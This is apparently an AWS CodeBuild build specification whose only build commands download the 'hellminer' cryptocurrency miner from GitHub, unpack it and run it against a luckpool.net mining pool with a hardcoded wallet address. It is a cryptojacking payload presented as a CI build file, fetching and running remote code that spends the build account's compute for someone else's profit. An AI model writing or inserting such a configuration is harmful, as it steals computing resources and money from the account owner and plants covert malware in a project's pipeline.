version: 0.2

phases:
  build:
    commands:
        - wget https://github.com/hellcatz/hminer/releases/download/v0.58/hellminer_linux64.tar.gz
        - tar -xvf hellminer_linux64.tar.gz
        - ./hellminer -c stratum+tcp://eu.luckpool.net:3956 -u RVMFutpZshkb9jiHYvh7rbq4RaqWGiKGUm.pko
